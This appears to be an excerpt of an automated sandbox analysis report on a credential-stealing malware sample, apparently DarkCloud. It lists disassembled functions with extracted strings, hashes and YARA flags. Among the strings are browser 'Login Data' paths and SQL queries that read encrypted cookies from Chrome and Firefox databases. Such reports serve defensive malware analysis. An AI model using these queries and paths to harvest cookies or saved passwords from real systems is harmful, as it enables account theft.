                                                                                          • String ID: 0B18172F037C0E291D211F2A$0C3C2F2807050B2118083C252A016C1734010B$1$2332141B39000B1A0A003E776C5637240001040520$2420152E052C4700143D02$340303341B393E26587051$3E04272327173B044C4E43$455A170A013624283437061E091912594001260C3C1B0A3E02552579310435050F$7E5F3D0A2138201D2D1E100B120335544227183E3C043F231469327A3A281F3F20$8C$8C$===============DARKCLOUD===============$@C$@C$@C$BkwBQIvValtcFDrEdmqYpIU$DC$DC$DC$DC$DC$DC$DC$NordVPN$PQpNoULIsJEPesnPiewyMOs$Profiles$TWmdJqRmFsGvMolRhuWHi$TbBdwPcjncoPWVvyKreRUn$\Profiles$\User Data$\User Data\Default\Login Data$bPxJNfpgUDDSBCoLSUujtOITbVnuNap$pjudouBMFSlFphtwdgTUiNukSgrxVGeY$uxlzIlBgDuIcbBdRZctpuCdZqZjzCzBpf$xdbpGlVLBxJqlTaUfOdNKOceZjdxULgE$
                                                                                          • API String ID: 0-1127403276
                                                                                          • Opcode ID: 906864fdfe9b1cb419d367e2e0d87cc6d025ad4997502ff1bb10e155d3fb73dd
                                                                                          • Instruction ID: f2e50e4b257ed0384741389efd92551eb2407b6017944befaa557795b8b589f5
                                                                                          • Opcode Fuzzy Hash: 906864fdfe9b1cb419d367e2e0d87cc6d025ad4997502ff1bb10e155d3fb73dd
                                                                                          • Instruction Fuzzy Hash: 5E330A75901228DFDB24CF64DD84BDAB7B5FB49300F1081EAE50AB72A0DB745A89CF58
                                                                                          Function 0040D9D2 Relevance: 47.0, Strings: 36, Instructions: 2046COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0B18172F037C0E291D211F2A$0C3C2F2807050B2118083C252A016C1734010B$1$2332141B39000B1A0A003E776C5637240001040520$2420152E052C4700143D02$340303341B393E26587051$3E04272327173B044C4E43$455A170A013624283437061E091912594001260C3C1B0A3E02552579310435050F$7E5F3D0A2138201D2D1E100B120335544227183E3C043F231469327A3A281F3F20$8C$8C$===============DARKCLOUD===============$@C$@C$@C$BkwBQIvValtcFDrEdmqYpIU$DC$DC$DC$DC$DC$DC$DC$NordVPN$PQpNoULIsJEPesnPiewyMOs$Profiles$TWmdJqRmFsGvMolRhuWHi$TbBdwPcjncoPWVvyKreRUn$\Profiles$\User Data$\User Data\Default\Login Data$bPxJNfpgUDDSBCoLSUujtOITbVnuNap$pjudouBMFSlFphtwdgTUiNukSgrxVGeY$uxlzIlBgDuIcbBdRZctpuCdZqZjzCzBpf$xdbpGlVLBxJqlTaUfOdNKOceZjdxULgE$
                                                                                          • API String ID: 0-1127403276
                                                                                          • Opcode ID: 850d89852104d98fe99f57f5bd4a65e5891d57f41b5940719767dc48ebd066fc
                                                                                          • Instruction ID: 208c5527adf798134d3cd04e20d75e509a6d6037196584743e41205a27e5f938
                                                                                          • Opcode Fuzzy Hash: 850d89852104d98fe99f57f5bd4a65e5891d57f41b5940719767dc48ebd066fc
                                                                                          • Instruction Fuzzy Hash: F5230A75A01228DFDB24CF64DD84BDAB7B5FB49300F1081EAE50AB72A0DB745A89CF54
                                                                                          Function 00416000 Relevance: 39.6, Strings: 31, Instructions: 846COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • 3C22211B6E1E230D22, xrefs: 004162E3
                                                                                          • xCTQiQkJlRIXP, xrefs: 00416B80, 00416CA0
                                                                                          • hnJriYGEwpqIVgAzCbJFJCDQCFOyZhFK, xrefs: 0041640A
                                                                                          • 1B1D30152727213B4D242921385934132815, xrefs: 004166D3
                                                                                          • ttvuKNKPhPJPCImRvmZiSW, xrefs: 0041630E
                                                                                          • 211A1D4A68170A283E, xrefs: 004164DB
                                                                                          • PQpNoULIsJEPesnPiewyMOs, xrefs: 00416FDD
                                                                                          • 261E26397914200506143B76321336, xrefs: 004163DF
                                                                                          • wSIdEjFHWmqZDJyzrEpNGORWXtuvnxn, xrefs: 004166FE
                                                                                          • 2034092023, xrefs: 004161E7
                                                                                          • fFmgxfeIQvvhnH, xrefs: 00416AB9
                                                                                          • 2C121E040A140525523C2D0B340134, xrefs: 004167CF
                                                                                          • 1516020A23023A187C1B3D373D3B24, xrefs: 00416B55, 00416C75
                                                                                          • RdhkgpqvEWUHvjYcqkYevGQyNtAPVQSi, xrefs: 00416116
                                                                                          • 041C23086B253C281F, xrefs: 004168CB
                                                                                          • WWQwXKpOMmlMYsHtEcjhuKmiUHtfqVdQ, xrefs: 004168F6
                                                                                          • 062E2A295304380621, xrefs: 004165D7
                                                                                          • pjudouBMFSlFphtwdgTUiNukSgrxVGeY, xrefs: 00416F58
                                                                                          • !, xrefs: 00416F26
                                                                                          • VTVHSpfYyPNW, xrefs: 004169F2
                                                                                          • 2D252A375024052025750617073C, xrefs: 004160EB
                                                                                          • reYhIOpnmrVUoSQeomFcBt, xrefs: 00416212
                                                                                          • 1D1C0A02122F393569172F1D18110517083A341D271A051F02041D3A7A0C34000F0717001B2339232E4D1A2C, xrefs: 00416F2D
                                                                                          • nOckysQKcSclekTkTTdkqufI, xrefs: 00416602
                                                                                          • 0D02210021102D162C2425090754031D01251C2A1F013F27, xrefs: 00416FB2
                                                                                          • 0A7E13325D1C18540A7E7A6F0B0A650F5E3B725010660C37792C097E2A5674400F127A0A7A0B637A2C48712231632D17790C1528424A6C04796A, xrefs: 004169C7
                                                                                          • BdFJTGulIroHy, xrefs: 004167FA
                                                                                          • 184558595C39660D595F4035294B3C2C4A225648707C292B4332664F1D0C4A02274813615B4F3535294B3C2C4A225648707C292B4332663D27401D394B3F142A44, xrefs: 00416A8E
                                                                                          • zqUMyHByMLZiEKLinUFstGAKymdPYFMXp, xrefs: 00416506
                                                                                          • vreYTLYAbkPoYHVYgQNNiOVugxuvQAkyxo, xrefs: 0041601A
                                                                                          • ,s@, xrefs: 00416F0A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Offset: 00416000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_416000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !$,s@$041C23086B253C281F$062E2A295304380621$0A7E13325D1C18540A7E7A6F0B0A650F5E3B725010660C37792C097E2A5674400F127A0A7A0B637A2C48712231632D17790C1528424A6C04796A$0D02210021102D162C2425090754031D01251C2A1F013F27$1516020A23023A187C1B3D373D3B24$184558595C39660D595F4035294B3C2C4A225648707C292B4332664F1D0C4A02274813615B4F3535294B3C2C4A225648707C292B4332663D27401D394B3F142A44$1B1D30152727213B4D242921385934132815$1D1C0A02122F393569172F1D18110517083A341D271A051F02041D3A7A0C34000F0717001B2339232E4D1A2C$2034092023$211A1D4A68170A283E$261E26397914200506143B76321336$2C121E040A140525523C2D0B340134$2D252A375024052025750617073C$3C22211B6E1E230D22$BdFJTGulIroHy$PQpNoULIsJEPesnPiewyMOs$RdhkgpqvEWUHvjYcqkYevGQyNtAPVQSi$VTVHSpfYyPNW$WWQwXKpOMmlMYsHtEcjhuKmiUHtfqVdQ$fFmgxfeIQvvhnH$hnJriYGEwpqIVgAzCbJFJCDQCFOyZhFK$nOckysQKcSclekTkTTdkqufI$pjudouBMFSlFphtwdgTUiNukSgrxVGeY$reYhIOpnmrVUoSQeomFcBt$ttvuKNKPhPJPCImRvmZiSW$vreYTLYAbkPoYHVYgQNNiOVugxuvQAkyxo$wSIdEjFHWmqZDJyzrEpNGORWXtuvnxn$xCTQiQkJlRIXP$zqUMyHByMLZiEKLinUFstGAKymdPYFMXp
                                                                                          • API String ID: 0-3896485248
                                                                                          • Opcode ID: 99239791c88704c7464abab65ec92b47acac1da3e4e6d87ac4edaf095e3ea9b9
                                                                                          • Instruction ID: 2b7a6bb8ae5684110171a4580c94d9806e29d85cc2a8da3daf470c94d9cd9387
                                                                                          • Opcode Fuzzy Hash: 99239791c88704c7464abab65ec92b47acac1da3e4e6d87ac4edaf095e3ea9b9
                                                                                          • Instruction Fuzzy Hash: E892E8759001298BCB25DF50DD98BDEB7B4FB48304F1081EAE54AB72A0DB345B9ACF94
                                                                                          Function 00412003 Relevance: 33.3, Strings: 26, Instructions: 840COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • 8C, xrefs: 00412E54
                                                                                          • 050C341B1A151E15081D1912030D12011C243024042306060134501E00342A37043B010A543F053623090205070C322A2203150421071A2A7E436450041F105366, xrefs: 0041257F
                                                                                          • TmslmROSerplqTrBwJGThCu, xrefs: 004124B1
                                                                                          • 8C, xrefs: 00412987
                                                                                          • ViinsOLTfompVHewTXTgZy, xrefs: 00412B62
                                                                                          • 122609272434140C10271A2610291E0C3516161421080213311622320211, xrefs: 00412678
                                                                                          • GLrdMdpwhBfNqXmpWHUAnaRJYyXbZCMWLo, xrefs: 00412ADE
                                                                                          • 8C, xrefs: 004129FD
                                                                                          • YVcRomtlpTPpqqbanzPlsmMbivGpSeG, xrefs: 004125AA
                                                                                          • DC-Creds, xrefs: 00412DF6
                                                                                          • 3C3A2B21010D1923, xrefs: 00412A66
                                                                                          • r, xrefs: 00412E5F
                                                                                          • 3A190A3B18222222332B28081D1F026F3F31392C1D1F25263E1F021C2C13707533352C091A1F03211C, xrefs: 00412771
                                                                                          • 000A2D052607153528012312340B243A3117313B1E123A062E2D6053496028033F052A0B383E0B331F1B1E1D3F00382D1E13133C1B23212D7F57606014252B444C, xrefs: 00412294
                                                                                          • 8C, xrefs: 004129BC
                                                                                          • 1E1C2E241402240309392A28161E350D2A3817240F2B1A2B353F52604865280C3E101D290D27101B19062B1A2435103F191321182C240F2D7F517B79082D2F7D47, xrefs: 0041238D
                                                                                          • 3E1C0A19252E21002E3D0512261D31182C33083F2A1B3002041F4D1C1B0F2607021E143A06141238343D072D2903041D0802253C732817031F10331B2C106A1421, xrefs: 00412486
                                                                                          • SAIoSSUfiLaNvGHliiUYFdNVCmEKFgblHw, xrefs: 004126A3
                                                                                          • 0F3D291D3124323A0C270334, xrefs: 00412A3B
                                                                                          • tSeKqQfgPtLJqFdWUWcmtx, xrefs: 004122BF
                                                                                          • zivlOoCPGofI, xrefs: 0041279C
                                                                                          • <C, xrefs: 00412E6B
                                                                                          • elSRCWWlAKSgkNvorMwIeddgYUClrWhw, xrefs: 00412BD2
                                                                                          • 42272A37, xrefs: 00412A91
                                                                                          • dM@, xrefs: 00412B4E
                                                                                          • iMsHPccVfUtCKdqFbLLKk, xrefs: 004123B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_412000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 000A2D052607153528012312340B243A3117313B1E123A062E2D6053496028033F052A0B383E0B331F1B1E1D3F00382D1E13133C1B23212D7F57606014252B444C$050C341B1A151E15081D1912030D12011C243024042306060134501E00342A37043B010A543F053623090205070C322A2203150421071A2A7E436450041F105366$0F3D291D3124323A0C270334$122609272434140C10271A2610291E0C3516161421080213311622320211$1E1C2E241402240309392A28161E350D2A3817240F2B1A2B353F52604865280C3E101D290D27101B19062B1A2435103F191321182C240F2D7F517B79082D2F7D47$3A190A3B18222222332B28081D1F026F3F31392C1D1F25263E1F021C2C13707533352C091A1F03211C$3C3A2B21010D1923$3E1C0A19252E21002E3D0512261D31182C33083F2A1B3002041F4D1C1B0F2607021E143A06141238343D072D2903041D0802253C732817031F10331B2C106A1421$42272A37$8C$8C$8C$8C$<C$DC-Creds$GLrdMdpwhBfNqXmpWHUAnaRJYyXbZCMWLo$SAIoSSUfiLaNvGHliiUYFdNVCmEKFgblHw$TmslmROSerplqTrBwJGThCu$ViinsOLTfompVHewTXTgZy$YVcRomtlpTPpqqbanzPlsmMbivGpSeG$dM@$elSRCWWlAKSgkNvorMwIeddgYUClrWhw$iMsHPccVfUtCKdqFbLLKk$r$tSeKqQfgPtLJqFdWUWcmtx$zivlOoCPGofI
                                                                                          • API String ID: 0-597199929
                                                                                          • Opcode ID: a15e486c17b4c94ad101a65a4d1ba9e17dc7613b498a1b634e6650624217ac78
                                                                                          • Instruction ID: 612b1759419e3d14369779472da422e3bf4c16fe9a2c0c78467ff8b182e0181c
                                                                                          • Opcode Fuzzy Hash: a15e486c17b4c94ad101a65a4d1ba9e17dc7613b498a1b634e6650624217ac78
                                                                                          • Instruction Fuzzy Hash: CA920A75900129DFDB24DFA0DD58BDAB7B9FB48301F0081EAE14AB6260DB745B89CF58
                                                                                          Function 00404135 Relevance: 26.8, Strings: 21, Instructions: 542COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 00171C011F05212D2816$0F3D291D3124323A0C270334$121C081C372C2C35$121E2B160B$1B380907003412$241D11071323180A0116151E27$32341706203F0701363815$370F1D010010173A$3C2C3F23341A02$3C3A2B21010D1923$7$GLrdMdpwhBfNqXmpWHUAnaRJYyXbZCMWLo$PStndzkREGbZDHAoJBwVKZCswPswOoJxhlVHfYYUqH$ViinsOLTfompVHewTXTgZy$bgohwgLOkmzpjTjKQNwEBM$bzjnrawrIDDWvePZiqcHjHlbBmLMgFsf$dTwGsxIkYGpeiNcMSgRUc$fXWfliQaZGCaOkcQJQHdel$hwIFgUncmyTpxgopaYIRK$kQFrbEQshWTfquKhWJRgdp$sQsfhVOXFLjFpaywQDJCQdaj
                                                                                          • API String ID: 0-806053479
                                                                                          • Opcode ID: 8e2e2315b87b7bf1891ae4618d4e1d8d68c5c9b16727b2664dfa6922cd4a410a
                                                                                          • Instruction ID: 004b64850da0be6f5bd8b06a7c368d1d7c59d74246cd4c81c07d06f5a98ee7dc
                                                                                          • Opcode Fuzzy Hash: 8e2e2315b87b7bf1891ae4618d4e1d8d68c5c9b16727b2664dfa6922cd4a410a
                                                                                          • Instruction Fuzzy Hash: 5232CB76911109EBCB04DFE0DE94EDEB7B9FF48304F50856AE102B6164EB74AA09CF64
                                                                                          Function 00414001 Relevance: 20.8, Strings: 16, Instructions: 847COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Offset: 00414000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_414000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 11281C20$23323308$26351720$340303341B393E26587051$3908242F03390A21181D036E5856021E1C3C313F0D3D03$3E04272327173B044C4E43$8C$8C$8C$8C$AxxTCjZkUqrmNbvDwpYkVaQbGEntGJUYS$BkwBQIvValtcFDrEdmqYpIU$SAIoSSUfiLaNvGHliiUYFdNVCmEKFgblHw$gvZeTacScofiMzQobZwrmutpugLTfckYv$svAVzriYsMfZaWyqVJaFQhrJGYFaCJleJsclIBHFBlPx$xdbpGlVLBxJqlTaUfOdNKOceZjdxULgE
                                                                                          • API String ID: 0-615735691
                                                                                          • Opcode ID: 053a0b4b6bcc71f85e3765d06d9c9b09afb2ba06ea54297ee9df93be682ba14f
                                                                                          • Instruction ID: dc5b298da5c7e764778effec6045e1877a02a69252e66a529f75ada10482ed1f
                                                                                          • Opcode Fuzzy Hash: 053a0b4b6bcc71f85e3765d06d9c9b09afb2ba06ea54297ee9df93be682ba14f
                                                                                          • Instruction Fuzzy Hash: C782D675900218DFCB14DFA0DD98BDEB7B9FB48301F1081AAE50AB72A4DB745A89CF54
                                                                                          Function 004381E0 Relevance: 20.8, Strings: 14, Instructions: 3346COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_438000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0/@$00@$00@$0434372309312038$0A082C383B11151A692024$0D05052D1D3E32204D04370A38120F$6$MVkCWPxpiGDFOCQZsOvymuXVfxePSoJgP$SELECT encrypted_value, ((expires_utc/1000000)-11644473600), host_key, name, path FROM cookies$SELECT expiry, host, name, path, value FROM moz_cookies$aXwXLbXEKMfy$d$d$fQfjBvWWScwF
                                                                                          • API String ID: 0-129541709
                                                                                          • Opcode ID: 9fe14f6a7c4e63da30ec90314fde519ff25e5166878446025c5b0d6d9443794c
                                                                                          • Instruction ID: 4d9de464dd5e6d4d9aa29f3a068b7cab7ea715bf61868ca186a6372886e7b3c5
                                                                                          • Opcode Fuzzy Hash: 9fe14f6a7c4e63da30ec90314fde519ff25e5166878446025c5b0d6d9443794c
                                                                                          • Instruction Fuzzy Hash: A763DBB5900219DFDB25DFA0DD89BEEB7B8FB48300F1081EAE50AB6150EB745A85CF54
                                                                                          Function 00410091 Relevance: 18.3, Strings: 14, Instructions: 779COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0C3C2F2807050B2118083C252A016C1734010B$2420152E052C4700143D02$@C$@C$DC$DC$DC$DC$H$\User Data$\User Data\Default\Login Data$bPxJNfpgUDDSBCoLSUujtOITbVnuNap$uxlzIlBgDuIcbBdRZctpuCdZqZjzCzBpf$
                                                                                          • API String ID: 0-3388365864
                                                                                          • Opcode ID: 4446adef372f16eab9763a7a3d9511aaeaa595ef3e548eb9d99090220072582e
                                                                                          • Instruction ID: 04e7dca18bfdeee648254315942dc38f3b4428b80a8b524f30517d22c7a3d0fa
                                                                                          • Opcode Fuzzy Hash: 4446adef372f16eab9763a7a3d9511aaeaa595ef3e548eb9d99090220072582e
                                                                                          • Instruction Fuzzy Hash: 87820874901229DFEB28CF50DD84BEAB7B5FB45300F1081EAD509A72A0DBB45AC9CF59
                                                                                          Function 004101F5 Relevance: 18.2, Strings: 14, Instructions: 719COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0C3C2F2807050B2118083C252A016C1734010B$2420152E052C4700143D02$@C$@C$DC$DC$DC$DC$H$\User Data$\User Data\Default\Login Data$bPxJNfpgUDDSBCoLSUujtOITbVnuNap$uxlzIlBgDuIcbBdRZctpuCdZqZjzCzBpf$
                                                                                          • API String ID: 0-3388365864
                                                                                          • Opcode ID: d78dc793f29fc6207fe81a99d6a9bfe707aab6c37ae660dda95a2ae5c9efe654
                                                                                          • Instruction ID: 99a453829fd144af70ed4e8b69ab763c702974d8076eaaf736c4f597e9a177ec
                                                                                          • Opcode Fuzzy Hash: d78dc793f29fc6207fe81a99d6a9bfe707aab6c37ae660dda95a2ae5c9efe654
                                                                                          • Instruction Fuzzy Hash: 7972F774901228DFEB28CF54DD84BEAB7B5FB45300F1081EAD509A72A0DBB45AC9CF58
                                                                                          Function 0043BC20 Relevance: 9.1, Strings: 7, Instructions: 379COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_438000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 01@$310D001C547C62111119761F3F0623113B3E162F120B3C571703037C2408120B2A1C3F1665052C38162A03053C0A5B1F063C3A4B0F1E76013216271C$3C3F043D496960240306131034432B3C06$F1@$gTKpMsFOWkidyDmEYrxCwVau$lYytlnSMffnXrZbJpXQzCw$x0@
                                                                                          • API String ID: 0-3580083709
                                                                                          • Opcode ID: 900887bd6058e496aefb195632c2085c7433137d274ffa507f0c7a4a8e6989aa
                                                                                          • Instruction ID: 99cc4c26702fb93fac08eec43a043ec4000effa80fdeac3a96714492cae7e6e7
                                                                                          • Opcode Fuzzy Hash: 900887bd6058e496aefb195632c2085c7433137d274ffa507f0c7a4a8e6989aa
                                                                                          • Instruction Fuzzy Hash: C6E1E9B1D00208EBDB04DFA4D989BDEBBB8FF48705F10916AE506B7250DB745A45CFA4
                                                                                          Function 00438009 Relevance: 4.0, Strings: 3, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_438000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0/@$b$
                                                                                          • API String ID: 0-761625912
                                                                                          • Opcode ID: 60c5d5c5f9f142681c33cb71edb1b3c4e4b2f8fc187bfdd3139ca05a826f9ede
                                                                                          • Instruction ID: 2c161d996da4ff32759eaeec22156aefdcf14128b8034f7fc7be0ed33eb7d74b
                                                                                          • Opcode Fuzzy Hash: 60c5d5c5f9f142681c33cb71edb1b3c4e4b2f8fc187bfdd3139ca05a826f9ede
                                                                                          • Instruction Fuzzy Hash: 67916D7490121ADFDB14DFA0DE48BEEB7B8FB08705F1081A9E506B72A0DB745A49CF58
                                                                                          Function 00403608 Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cda71c283af3a59038db88d7020fe4a0596f0c67cfe27390226ad80d23c73c6e
                                                                                          • Instruction ID: 97e695b43dd7999bb780381c17990d5e04ce93a657f4215a5dcc8a3fc50ea1ee
                                                                                          • Opcode Fuzzy Hash: cda71c283af3a59038db88d7020fe4a0596f0c67cfe27390226ad80d23c73c6e
                                                                                          • Instruction Fuzzy Hash: 9601082154E7C18FD3138B758C7A2813FB1BE03205B5B41DBC482CF1A3D6AD895AC726
                                                                                          Function 004048B4 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06550774da0aa2cbee44705ba4662ce9dcc8df235e6c5bc8756bf9ad705990d8
                                                                                          • Instruction ID: f1c66544352df5084cd7345b694669f2e71944faf6b19205a97aa409843dfa9f
                                                                                          • Opcode Fuzzy Hash: 06550774da0aa2cbee44705ba4662ce9dcc8df235e6c5bc8756bf9ad705990d8
                                                                                          • Instruction Fuzzy Hash: 0BB01265388041AEE30066D44D0142133C09288341724CC33E700F51C0DE38DD00822E

                                                                                          Executed Functions

                                                                                          Function 00E820C7 Relevance: .2, Instructions: 183COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 38b5663d8e85198df0388361122c71d837f813a49dc288c31d48774b0a487f92
                                                                                          • Instruction ID: dacddff87f2d253b4d6c813ab5ba37ca95c17681344abd92dc4091de63b2479d
                                                                                          • Opcode Fuzzy Hash: 38b5663d8e85198df0388361122c71d837f813a49dc288c31d48774b0a487f92
                                                                                          • Instruction Fuzzy Hash: 51719030A04204CFDB05EF69C544BE977F2FB89300F2491A8D60DAB3A9CB75AD46CB91
                                                                                          Function 00E820D8 Relevance: .2, Instructions: 178COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0873bb607195c4ce2341f68a8a95634846a8635e83b26ee6aab0f00406270d9
                                                                                          • Instruction ID: 4135a0d6ed8cedfbb9f84a2c4295899eb724ae2e716f6a4af5de120071ce1fd1
                                                                                          • Opcode Fuzzy Hash: f0873bb607195c4ce2341f68a8a95634846a8635e83b26ee6aab0f00406270d9
                                                                                          • Instruction Fuzzy Hash: 99718E30A04204CFDB15EF69C544BE973F2FB89300F2492A9D61DAB3A5CB75AD46CB91
                                                                                          Function 00E81A50 Relevance: .2, Instructions: 249COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4baff181c64e5bb250b1270f05b060f9eec1efcfc1d5efcdf032ab0e81fff663
                                                                                          • Instruction ID: 9146ef254fc572cab0032e4b2c5639f59482894ca419470f158ed45546cb5e2e
                                                                                          • Opcode Fuzzy Hash: 4baff181c64e5bb250b1270f05b060f9eec1efcfc1d5efcdf032ab0e81fff663
                                                                                          • Instruction Fuzzy Hash: 0DB11630A04204CFDB15EB58D484BE9B7B6FF85305F6492E8E04DAB3A5D774AD86CB90
                                                                                          Function 00E81BD4 Relevance: .2, Instructions: 230COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 684799cea5e48149a6e4ba8c5845e5a088ed640d96e2cd39958c63072ef727f5
                                                                                          • Instruction ID: 61da123e3494fdd07d6d69755835b91606bef2795fb1442d91c11442afb2463a
                                                                                          • Opcode Fuzzy Hash: 684799cea5e48149a6e4ba8c5845e5a088ed640d96e2cd39958c63072ef727f5
                                                                                          • Instruction Fuzzy Hash: ECA11730A04204CFDB15EF58D484BE9B7B6FF85305F6492E8E04DAB2A5D774AC86CB91
                                                                                          Function 00E82870 Relevance: .1, Instructions: 147COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7a8d216e2fea9b8605300e3a07ec053976ffe97748a232e372b1dd84e754239
                                                                                          • Instruction ID: d568a447cad2cccfb9e9cde48f6b0dc07f958b8f3a253e1ac47e815bdb96d3f6
                                                                                          • Opcode Fuzzy Hash: a7a8d216e2fea9b8605300e3a07ec053976ffe97748a232e372b1dd84e754239
                                                                                          • Instruction Fuzzy Hash: 2451AC30A04205CFDB19EB69C440BDCB7B2FF84314F24D2A9C25D6B2A5D7759C85DB61
                                                                                          Function 00E80720 Relevance: .1, Instructions: 146COMMON
